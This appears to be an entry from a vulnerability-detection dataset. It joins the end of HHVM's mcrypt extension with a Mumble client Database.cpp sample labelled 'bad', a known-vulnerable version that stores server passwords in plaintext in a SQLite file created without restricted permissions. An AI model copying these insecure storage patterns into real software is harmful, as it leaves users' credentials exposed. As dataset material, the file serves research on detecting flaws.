if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_iv_size");
return false;
}
int64_t ret = mcrypt_enc_get_iv_size(td);
mcrypt_module_close(td);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_key_size, const String& cipher,
const String& module) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)module.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_key_size");
return false;
}
int64_t ret = mcrypt_enc_get_key_size(td);
mcrypt_module_close(td);
return ret;
}
String HHVM_FUNCTION(mcrypt_enc_get_algorithms_name, const Resource& td) {
char *name = mcrypt_enc_get_algorithms_name(td.getTyped<MCrypt>()->m_td);
String ret(name, CopyString);
mcrypt_free(name);
return ret;
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_block_size, const Resource& td) {
return mcrypt_enc_get_block_size(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_iv_size, const Resource& td) {
return mcrypt_enc_get_iv_size(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_key_size, const Resource& td) {
return mcrypt_enc_get_key_size(td.getTyped<MCrypt>()->m_td);
}
String HHVM_FUNCTION(mcrypt_enc_get_modes_name, const Resource& td) {
char *name = mcrypt_enc_get_modes_name(td.getTyped<MCrypt>()->m_td);
String ret(name, CopyString);
mcrypt_free(name);
return ret;
}
Array HHVM_FUNCTION(mcrypt_enc_get_supported_key_sizes, const Resource& td) {
int count = 0;
int *key_sizes =
mcrypt_enc_get_supported_key_sizes(td.getTyped<MCrypt>()->m_td, &count);
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(key_sizes[i]);
}
mcrypt_free(key_sizes);
return ret;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_algorithm_mode, const Resource& td) {
return mcrypt_enc_is_block_algorithm_mode(td.getTyped<MCrypt>()->m_td) == 1;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_algorithm, const Resource& td) {
return mcrypt_enc_is_block_algorithm(td.getTyped<MCrypt>()->m_td) == 1;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_mode, const Resource& td) {
return mcrypt_enc_is_block_mode(td.getTyped<MCrypt>()->m_td) == 1;
}
int64_t HHVM_FUNCTION(mcrypt_enc_self_test, const Resource& td) {
return mcrypt_enc_self_test(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_generic_init, const Resource& td,
const String& key,
const String& iv) {
MCrypt *pm = td.getTyped<MCrypt>();
int max_key_size = mcrypt_enc_get_key_size(pm->m_td);
int iv_size = mcrypt_enc_get_iv_size(pm->m_td);
if (key.empty()) {
raise_warning("Key size is 0");
}
unsigned char *key_s = (unsigned char *)malloc(key.size());
memset(key_s, 0, key.size());
unsigned char *iv_s = (unsigned char *)malloc(iv_size + 1);
memset(iv_s, 0, iv_size + 1);
int key_size;
if (key.size() > max_key_size) {
raise_warning("Key size too large; supplied length: %d, max: %d",
key.size(), max_key_size);
key_size = max_key_size;
} else {
key_size = key.size();
}
memcpy(key_s, key.data(), key.size());
if (iv.size() != iv_size) {
raise_warning("Iv size incorrect; supplied length: %d, needed: %d",
iv.size(), iv_size);
}
memcpy(iv_s, iv.data(), iv_size);
mcrypt_generic_deinit(pm->m_td);
int result = mcrypt_generic_init(pm->m_td, key_s, key_size, iv_s);
/* If this function fails, close the mcrypt module to prevent crashes
* when further functions want to access this resource */
if (result < 0) {
pm->close();
switch (result) {
case -3:
raise_warning("Key length incorrect");
break;
case -4:
raise_warning("Memory allocation error");
break;
case -1:
default:
raise_warning("Unknown error");
break;
}
}
pm->m_init = true;
free(iv_s);
free(key_s);
return result;
}
Variant HHVM_FUNCTION(mcrypt_generic, const Resource& td, const String& data) {
return mcrypt_generic(td, data, false);
}
Variant HHVM_FUNCTION(mdecrypt_generic, const Resource& td,
const String& data) {
return mcrypt_generic(td, data, true);
}
bool HHVM_FUNCTION(mcrypt_generic_deinit, const Resource& td) {
MCrypt *pm = td.getTyped<MCrypt>();
if (mcrypt_generic_deinit(pm->m_td) < 0) {
raise_warning("Could not terminate encryption specifier");
return false;
}
pm->m_init = false;
return true;
}
bool HHVM_FUNCTION(mcrypt_generic_end, const Resource& td) {
return HHVM_FUNCTION(mcrypt_generic_deinit, td);
}
///////////////////////////////////////////////////////////////////////////////
const StaticString s_MCRYPT_3DES("MCRYPT_3DES");
const StaticString s_MCRYPT_ARCFOUR("MCRYPT_ARCFOUR");
const StaticString s_MCRYPT_ARCFOUR_IV("MCRYPT_ARCFOUR_IV");
const StaticString s_MCRYPT_BLOWFISH("MCRYPT_BLOWFISH");
const StaticString s_MCRYPT_BLOWFISH_COMPAT("MCRYPT_BLOWFISH_COMPAT");
const StaticString s_MCRYPT_CAST_128("MCRYPT_CAST_128");
const StaticString s_MCRYPT_CAST_256("MCRYPT_CAST_256");
const StaticString s_MCRYPT_CRYPT("MCRYPT_CRYPT");
const StaticString s_MCRYPT_DECRYPT("MCRYPT_DECRYPT");
const StaticString s_MCRYPT_DES("MCRYPT_DES");
const StaticString s_MCRYPT_DEV_RANDOM("MCRYPT_DEV_RANDOM");
const StaticString s_MCRYPT_DEV_URANDOM("MCRYPT_DEV_URANDOM");
const StaticString s_MCRYPT_ENCRYPT("MCRYPT_ENCRYPT");
const StaticString s_MCRYPT_ENIGNA("MCRYPT_ENIGNA");
const StaticString s_MCRYPT_GOST("MCRYPT_GOST");
const StaticString s_MCRYPT_IDEA("MCRYPT_IDEA");
const StaticString s_MCRYPT_LOKI97("MCRYPT_LOKI97");
const StaticString s_MCRYPT_MARS("MCRYPT_MARS");
const StaticString s_MCRYPT_MODE_CBC("MCRYPT_MODE_CBC");
const StaticString s_MCRYPT_MODE_CFB("MCRYPT_MODE_CFB");
const StaticString s_MCRYPT_MODE_ECB("MCRYPT_MODE_ECB");
const StaticString s_MCRYPT_MODE_NOFB("MCRYPT_MODE_NOFB");
const StaticString s_MCRYPT_MODE_OFB("MCRYPT_MODE_OFB");
const StaticString s_MCRYPT_MODE_STREAM("MCRYPT_MODE_STREAM");
const StaticString s_MCRYPT_PANAMA("MCRYPT_PANAMA");
const StaticString s_MCRYPT_RAND("MCRYPT_RAND");
const StaticString s_MCRYPT_RC2("MCRYPT_RC2");
const StaticString s_MCRYPT_RC6("MCRYPT_RC6");
const StaticString s_MCRYPT_RIJNDAEL_128("MCRYPT_RIJNDAEL_128");
const StaticString s_MCRYPT_RIJNDAEL_192("MCRYPT_RIJNDAEL_192");
const StaticString s_MCRYPT_RIJNDAEL_256("MCRYPT_RIJNDAEL_256");
const StaticString s_MCRYPT_SAFER128("MCRYPT_SAFER128");
const StaticString s_MCRYPT_SAFER64("MCRYPT_SAFER64");
const StaticString s_MCRYPT_SAFERPLUS("MCRYPT_SAFERPLUS");
const StaticString s_MCRYPT_SERPENT("MCRYPT_SERPENT");
const StaticString s_MCRYPT_SKIPJACK("MCRYPT_SKIPJACK");
const StaticString s_MCRYPT_THREEWAY("MCRYPT_THREEWAY");
const StaticString s_MCRYPT_TRIPLEDES("MCRYPT_TRIPLEDES");
const StaticString s_MCRYPT_TWOFISH("MCRYPT_TWOFISH");
const StaticString s_MCRYPT_WAKE("MCRYPT_WAKE");
const StaticString s_MCRYPT_XTEA("MCRYPT_XTEA");
class McryptExtension : public Extension {
public:
McryptExtension() : Extension("mcrypt") {}
virtual void moduleInit() {
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_3DES.get(), StaticString("tripledes").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ARCFOUR.get(), StaticString("arcfour").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ARCFOUR_IV.get(), StaticString("arcfour-iv").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_BLOWFISH.get(), StaticString("blowfish").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_BLOWFISH_COMPAT.get(), StaticString("blowfish-compat").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CAST_128.get(), StaticString("cast-128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CAST_256.get(), StaticString("cast-256").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CRYPT.get(), StaticString("crypt").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DECRYPT.get(), 1
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_DES.get(), StaticString("des").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DEV_RANDOM.get(), RANDOM
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DEV_URANDOM.get(), URANDOM
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_ENCRYPT.get(), 0
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ENIGNA.get(), StaticString("crypt").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_GOST.get(), StaticString("gost").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_IDEA.get(), StaticString("idea").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_LOKI97.get(), StaticString("loki97").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MARS.get(), StaticString("mars").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_CBC.get(), StaticString("cbc").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_CFB.get(), StaticString("cfb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_ECB.get(), StaticString("ecb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_NOFB.get(), StaticString("nofb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_OFB.get(), StaticString("ofb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_STREAM.get(), StaticString("stream").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_PANAMA.get(), StaticString("panama").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_RAND.get(), RAND
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RC2.get(), StaticString("rc2").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RC6.get(), StaticString("rc6").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_128.get(), StaticString("rijndael-128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_192.get(), StaticString("rijndael-192").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_256.get(), StaticString("rijndael-256").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFER128.get(), StaticString("safer-sk128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFER64.get(), StaticString("safer-sk64").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFERPLUS.get(), StaticString("saferplus").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SERPENT.get(), StaticString("serpent").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SKIPJACK.get(), StaticString("skipjack").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_THREEWAY.get(), StaticString("threeway").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_TRIPLEDES.get(), StaticString("tripledes").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_TWOFISH.get(), StaticString("twofish").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_WAKE.get(), StaticString("wake").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_XTEA.get(), StaticString("xtea").get()
);
HHVM_FE(mcrypt_module_open);
HHVM_FE(mcrypt_module_close);
HHVM_FE(mcrypt_list_algorithms);
HHVM_FE(mcrypt_list_modes);
HHVM_FE(mcrypt_module_get_algo_block_size);
HHVM_FE(mcrypt_module_get_algo_key_size);
HHVM_FE(mcrypt_module_get_supported_key_sizes);
HHVM_FE(mcrypt_module_is_block_algorithm_mode);
HHVM_FE(mcrypt_module_is_block_algorithm);
HHVM_FE(mcrypt_module_is_block_mode);
HHVM_FE(mcrypt_module_self_test);
HHVM_FE(mcrypt_create_iv);
HHVM_FE(mcrypt_encrypt);
HHVM_FE(mcrypt_decrypt);
HHVM_FE(mcrypt_cbc);
HHVM_FE(mcrypt_cfb);
HHVM_FE(mcrypt_ecb);
HHVM_FE(mcrypt_ofb);
HHVM_FE(mcrypt_get_block_size);
HHVM_FE(mcrypt_get_cipher_name);
HHVM_FE(mcrypt_get_iv_size);
HHVM_FE(mcrypt_get_key_size);
HHVM_FE(mcrypt_enc_get_algorithms_name);
HHVM_FE(mcrypt_enc_get_block_size);
HHVM_FE(mcrypt_enc_get_iv_size);
HHVM_FE(mcrypt_enc_get_key_size);
HHVM_FE(mcrypt_enc_get_modes_name);
HHVM_FE(mcrypt_enc_get_supported_key_sizes);
HHVM_FE(mcrypt_enc_is_block_algorithm_mode);
HHVM_FE(mcrypt_enc_is_block_algorithm);
HHVM_FE(mcrypt_enc_is_block_mode);
HHVM_FE(mcrypt_enc_self_test);
HHVM_FE(mcrypt_generic_init);
HHVM_FE(mcrypt_generic);
HHVM_FE(mdecrypt_generic);
HHVM_FE(mcrypt_generic_deinit);
HHVM_FE(mcrypt_generic_end);
loadSystemlib();
}
} s_mcrypt_extension;
///////////////////////////////////////////////////////////////////////////////
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/good_2259_0 |
crossvul-cpp_data_bad_3579_0 | /* Copyright (C) 2005-2011, Thorvald Natvig <thorvald@natvig.com>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the Mumble Developers nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "Database.h"
#include "Global.h"
#include "Message.h"
#include "Net.h"
#include "Version.h"
Database::Database() {
QSqlDatabase db = QSqlDatabase::addDatabase(QLatin1String("QSQLITE"));
QSettings qs;
QStringList datapaths;
int i;
datapaths << g.qdBasePath.absolutePath();
datapaths << QDesktopServices::storageLocation(QDesktopServices::DataLocation);
#if defined(Q_OS_UNIX) && ! defined(Q_OS_MAC)
datapaths << QDir::homePath() + QLatin1String("/.config/Mumble");
#endif
datapaths << QDir::homePath();
datapaths << QDir::currentPath();
datapaths << qApp->applicationDirPath();
datapaths << qs.value(QLatin1String("InstPath")).toString();
bool found = false;
for (i = 0; (i < datapaths.size()) && ! found; i++) {
if (!datapaths[i].isEmpty()) {
QFile f(datapaths[i] + QLatin1String("/mumble.sqlite"));
if (f.exists()) {
db.setDatabaseName(f.fileName());
found = db.open();
}
QFile f2(datapaths[i] + QLatin1String("/.mumble.sqlite"));
if (f2.exists()) {
db.setDatabaseName(f2.fileName());
found = db.open();
}
}
}
if (! found) {
for (i = 0; (i < datapaths.size()) && ! found; i++) {
if (!datapaths[i].isEmpty()) {
QDir::root().mkpath(datapaths[i]);
#ifdef Q_OS_WIN
QFile f(datapaths[i] + QLatin1String("/mumble.sqlite"));
#else
QFile f(datapaths[i] + QLatin1String("/.mumble.sqlite"));
#endif
db.setDatabaseName(f.fileName());
found = db.open();
}
}
}
if (! found) {
QMessageBox::critical(NULL, QLatin1String("Mumble"), tr("Mumble failed to initialize a database in any\nof the possible locations."), QMessageBox::Ok | QMessageBox::Default, QMessageBox::NoButton);
qFatal("Database: Failed initialization");
}
QFileInfo fi(db.databaseName());
if (! fi.isWritable()) {
QMessageBox::critical(NULL, QLatin1String("Mumble"), tr("The database '%1' is read-only. Mumble cannot store server settings (i.e. SSL certificates) until you fix this problem.").arg(fi.filePath()), QMessageBox::Ok | QMessageBox::Default, QMessageBox::NoButton);
qWarning("Database: Database is read-only");
}
QSqlQuery query;
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `servers` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT, `hostname` TEXT, `port` INTEGER DEFAULT " MUMTEXT(DEFAULT_MUMBLE_PORT) ", `username` TEXT, `password` TEXT)"));
query.exec(QLatin1String("ALTER TABLE `servers` ADD COLUMN `url` TEXT"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `comments` (`who` TEXT, `comment` BLOB, `seen` DATE)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `comments_comment` ON `comments`(`who`, `comment`)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `comments_seen` ON `comments`(`seen`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `blobs` (`hash` TEXT, `data` BLOB, `seen` DATE)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `blobs_hash` ON `blobs`(`hash`)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `blobs_seen` ON `blobs`(`seen`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `tokens` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB, `token` TEXT)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `tokens_host_port` ON `tokens`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `shortcut` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB, `shortcut` BLOB, `target` BLOB, `suppress` INTEGER)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `shortcut_host_port` ON `shortcut`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `udp` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `udp_host_port` ON `udp`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `cert` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hostname` TEXT, `port` INTEGER, `digest` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `cert_host_port` ON `cert`(`hostname`,`port`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `friends` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT, `hash` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `friends_name` ON `friends`(`name`)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `friends_hash` ON `friends`(`hash`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `muted` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hash` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `muted_hash` ON `muted`(`hash`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `pingcache` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hostname` TEXT, `port` INTEGER, `ping` INTEGER)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `pingcache_host_port` ON `pingcache`(`hostname`,`port`)"));
query.exec(QLatin1String("DELETE FROM `comments` WHERE `seen` < datetime('now', '-1 years')"));
query.exec(QLatin1String("DELETE FROM `blobs` WHERE `seen` < datetime('now', '-1 months')"));
query.exec(QLatin1String("VACUUM"));
query.exec(QLatin1String("PRAGMA synchronous = OFF"));
query.exec(QLatin1String("PRAGMA journal_mode = TRUNCATE"));
query.exec(QLatin1String("SELECT sqlite_version()"));
while (query.next())
qWarning() << "Database SQLite:" << query.value(0).toString();
}
Database::~Database() {
QSqlQuery query;
query.exec(QLatin1String("PRAGMA journal_mode = DELETE"));
query.exec(QLatin1String("VACUUM"));
}
QList<FavoriteServer> Database::getFavorites() {
QSqlQuery query;
QList<FavoriteServer> ql;
query.prepare(QLatin1String("SELECT `name`, `hostname`, `port`, `username`, `password`, `url` FROM `servers` ORDER BY `name`"));
query.exec();
while (query.next()) {
FavoriteServer fs;
fs.qsName = query.value(0).toString();
fs.qsHostname = query.value(1).toString();
fs.usPort = static_cast<unsigned short>(query.value(2).toUInt());
fs.qsUsername = query.value(3).toString();
fs.qsPassword = query.value(4).toString();
fs.qsUrl = query.value(5).toString();
ql << fs;
}
return ql;
}
void Database::setFavorites(const QList<FavoriteServer> &servers) {
QSqlQuery query;
QSqlDatabase::database().transaction();
query.prepare(QLatin1String("DELETE FROM `servers`"));
query.exec();
query.prepare(QLatin1String("REPLACE INTO `servers` (`name`, `hostname`, `port`, `username`, `password`, `url`) VALUES (?,?,?,?,?,?)"));
foreach(const FavoriteServer &s, servers) {
query.addBindValue(s.qsName);
query.addBindValue(s.qsHostname);
query.addBindValue(s.usPort);
query.addBindValue(s.qsUsername);
query.addBindValue(s.qsPassword);
query.addBindValue(s.qsUrl);
query.exec();
}
QSqlDatabase::database().commit();
}
bool Database::isLocalMuted(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `hash` FROM `muted` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
while (query.next()) {
return true;
}
return false;
}
void Database::setLocalMuted(const QString &hash, bool muted) {
QSqlQuery query;
if (muted)
query.prepare(QLatin1String("INSERT INTO `muted` (`hash`) VALUES (?)"));
else
query.prepare(QLatin1String("DELETE FROM `muted` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
}
QMap<QPair<QString, unsigned short>, unsigned int> Database::getPingCache() {
QSqlQuery query;
QMap<QPair<QString, unsigned short>, unsigned int> map;
query.prepare(QLatin1String("SELECT `hostname`, `port`, `ping` FROM `pingcache`"));
query.exec();
while (query.next()) {
map.insert(QPair<QString, unsigned short>(query.value(0).toString(), query.value(1).toUInt()), query.value(2).toUInt());
}
return map;
}
void Database::setPingCache(const QMap<QPair<QString, unsigned short>, unsigned int> &map) {
QSqlQuery query;
QMap<QPair<QString, unsigned short>, unsigned int>::const_iterator i;
QSqlDatabase::database().transaction();
query.prepare(QLatin1String("DELETE FROM `pingcache`"));
query.exec();
query.prepare(QLatin1String("REPLACE INTO `pingcache` (`hostname`, `port`, `ping`) VALUES (?,?,?)"));
for (i = map.constBegin(); i != map.constEnd(); ++i) {
query.addBindValue(i.key().first);
query.addBindValue(i.key().second);
query.addBindValue(i.value());
query.exec();
}
QSqlDatabase::database().commit();
}
bool Database::seenComment(const QString &hash, const QByteArray &commenthash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT COUNT(*) FROM `comments` WHERE `who` = ? AND `comment` = ?"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
if (query.next()) {
if (query.value(0).toInt() > 0) {
query.prepare(QLatin1String("UPDATE `comments` SET `seen` = datetime('now') WHERE `who` = ? AND `comment` = ?"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
return true;
}
}
return false;
}
void Database::setSeenComment(const QString &hash, const QByteArray &commenthash) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `comments` (`who`, `comment`, `seen`) VALUES (?, ?, datetime('now'))"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
}
QByteArray Database::blob(const QByteArray &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `data` FROM `blobs` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
if (query.next()) {
QByteArray qba = query.value(0).toByteArray();
query.prepare(QLatin1String("UPDATE `blobs` SET `seen` = datetime('now') WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
return qba;
}
return QByteArray();
}
void Database::setBlob(const QByteArray &hash, const QByteArray &data) {
if (hash.isEmpty() || data.isEmpty())
return;
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `blobs` (`hash`, `data`, `seen`) VALUES (?, ?, datetime('now'))"));
query.addBindValue(hash);
query.addBindValue(data);
query.exec();
}
QStringList Database::getTokens(const QByteArray &digest) {
QList<QString> qsl;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `token` FROM `tokens` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
while (query.next()) {
qsl << query.value(0).toString();
}
return qsl;
}
void Database::setTokens(const QByteArray &digest, QStringList &tokens) {
QSqlQuery query;
query.prepare(QLatin1String("DELETE FROM `tokens` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
query.prepare(QLatin1String("INSERT INTO `tokens` (`digest`, `token`) VALUES (?,?)"));
foreach(const QString &qs, tokens) {
query.addBindValue(digest);
query.addBindValue(qs);
query.exec();
}
}
QList<Shortcut> Database::getShortcuts(const QByteArray &digest) {
QList<Shortcut> ql;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `shortcut`,`target`,`suppress` FROM `shortcut` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
while (query.next()) {
Shortcut sc;
QByteArray a = query.value(0).toByteArray();
{
QDataStream s(&a, QIODevice::ReadOnly);
s.setVersion(QDataStream::Qt_4_0);
s >> sc.qlButtons;
}
a = query.value(1).toByteArray();
{
QDataStream s(&a, QIODevice::ReadOnly);
s.setVersion(QDataStream::Qt_4_0);
s >> sc.qvData;
}
sc.bSuppress=query.value(2).toBool();
ql << sc;
}
return ql;
}
bool Database::setShortcuts(const QByteArray &digest, QList<Shortcut> &shortcuts) {
QSqlQuery query;
bool updated = false;
query.prepare(QLatin1String("DELETE FROM `shortcut` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
const QList<Shortcut> scs = shortcuts;
query.prepare(QLatin1String("INSERT INTO `shortcut` (`digest`, `shortcut`, `target`, `suppress`) VALUES (?,?,?,?)"));
foreach(const Shortcut &sc, scs) {
if (sc.isServerSpecific()) {
shortcuts.removeAll(sc);
updated = true;
query.addBindValue(digest);
QByteArray a;
{
QDataStream s(&a, QIODevice::WriteOnly);
s.setVersion(QDataStream::Qt_4_0);
s << sc.qlButtons;
}
query.addBindValue(a);
a.clear();
{
QDataStream s(&a, QIODevice::WriteOnly);
s.setVersion(QDataStream::Qt_4_0);
s << sc.qvData;
}
query.addBindValue(a);
query.addBindValue(sc.bSuppress);
query.exec();
}
}
return updated;
}
const QMap<QString, QString> Database::getFriends() {
QMap<QString, QString> qm;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `name`, `hash` FROM `friends`"));
query.exec();
while (query.next())
qm.insert(query.value(0).toString(), query.value(1).toString());
return qm;
}
const QString Database::getFriend(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `name` FROM `friends` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
if (query.next())
return query.value(0).toString();
return QString();
}
void Database::addFriend(const QString &name, const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `friends` (`name`, `hash`) VALUES (?,?)"));
query.addBindValue(name);
query.addBindValue(hash);
query.exec();
}
void Database::removeFriend(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("DELETE FROM `friends` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
}
const QString Database::getDigest(const QString &hostname, unsigned short port) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `digest` FROM `cert` WHERE `hostname` = ? AND `port` = ?"));
query.addBindValue(hostname);
query.addBindValue(port);
query.exec();
if (query.next()) {
return query.value(0).toString();
}
return QString();
}
void Database::setDigest(const QString &hostname, unsigned short port, const QString &digest) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `cert` (`hostname`,`port`,`digest`) VALUES (?,?,?)"));
query.addBindValue(hostname);
query.addBindValue(port);
query.addBindValue(digest);
query.exec();
}
void Database::setPassword(const QString &hostname, unsigned short port, const QString &uname, const QString &pw) {
QSqlQuery query;
query.prepare(QLatin1String("UPDATE `servers` SET `password` = ? WHERE `hostname` = ? AND `port` = ? AND `username` = ?"));
query.addBindValue(pw);
query.addBindValue(hostname);
query.addBindValue(port);
query.addBindValue(uname);
query.exec();
}
bool Database::getUdp(const QByteArray &digest) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT COUNT(*) FROM `udp` WHERE `digest` = ? "));
query.addBindValue(digest);
query.exec();
if (query.next()) {
return (query.value(0).toInt() == 0);
}
return true;
}
void Database::setUdp(const QByteArray &digest, bool udp) {
QSqlQuery query;
if (! udp)
query.prepare(QLatin1String("REPLACE INTO `udp` (`digest`) VALUES (?)"));
else
query.prepare(QLatin1String("DELETE FROM `udp` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
}
